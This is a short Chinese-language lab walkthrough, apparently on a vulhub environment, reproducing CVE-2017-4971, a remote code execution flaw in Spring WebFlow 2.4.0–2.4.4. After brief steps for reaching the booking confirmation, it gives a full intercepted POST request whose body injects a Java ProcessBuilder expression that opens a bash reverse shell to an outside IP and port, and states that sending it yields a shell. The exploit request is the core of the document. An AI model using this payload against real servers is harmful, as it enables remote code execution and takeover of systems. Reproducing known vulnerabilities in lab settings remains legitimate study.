vulhub中spring的CVE-2017-4971漏洞复现

影响版本

Spring WebFlow 2.4.0 - 2.4.4

具体过程

将登录框左侧的密码随便输入一个，登录

看到这个页面后，更改url，

改为/hotels/1，可以看到这个页面

点击Book Hotel，在出现的页面随便输入，点击proceed

点击confirm，并且用burpsuite拦截改包

改为

POST /hotels/booking?execution=e1s2 HTTP/1.1
Host: 192.168.188.128:8080
Content-Length: 171
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.188.128:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.188.128:8080/hotels/booking?execution=e1s2
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=1CC60FDF25A8EB1F8AB1ADFD04082F4D
Connection: close

_eventId_confirm=&_csrf=3d23aab5-bd96-4bf3-a34f-092721a3aac2&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/192.168.38.43/10086+0>%261")).start()=vulhub

发送后就可以拿到shell

参考博客

漏洞复现-CVE-2017-4971-Spring Web Flow 远程代码执行 - 铺哩 - 博客园 (cnblogs.com)